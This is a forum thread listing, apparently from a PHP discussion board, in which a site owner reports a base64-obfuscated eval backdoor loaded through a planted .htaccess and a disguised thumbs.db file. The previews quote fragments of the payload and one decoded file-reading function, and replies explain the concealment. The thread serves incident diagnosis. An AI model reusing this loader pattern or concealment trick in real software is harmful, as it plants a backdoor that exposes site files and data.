看板
[ PHP ]
討論串[請益] php 網站被植入密文 base64_decode
共 5 篇文章
內容預覽:
這陣子感覺網站很慢. 研究了一下. 發現了 不認識的檔案 .htaccess 聯結了 thumbs.db. 裡頭竟然不是我想像中的圖片?. 而是base64加密的密文. <?php. @eval(base64_decode("aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU1N
(還有7326個字)
內容預覽:
先解到這邊. 建議你. passwd 全換一換吧. function evaloPoIEXQacJTquN($s) {return @file_get_contents($s);}. 他老兄要抓你的local file 都沒問題啦.. DB 應該也被趴走了吧 (茶). 要找這種code最快的就是從
(還有244個字)
內容預覽:
太慘了 ............................ 我有些私密的東西放在這個網域裡面的儲存裝置 (不是在這個server) 慘慘慘. 我大概說明一下. 我的網站是. 中華電信 50m/5m. 硬體 i5-2400 + ASRock h67m-itx + 4G*2 ddr3 + Inte
(還有381個字)
內容預覽:
沒啥, 就放了. .htaccess 叫他所有php編譯前去抓另一個 thumbs.db (被編過的php) 進來一起編. Thumbs.db 為啥會用這個檔名, 很簡單. Win 不會顯示出來, 他是縮圖檔.. 先說這方面我不是專業.. 1. 這兩個file是那個 User 放的.. Linux
(還有65個字)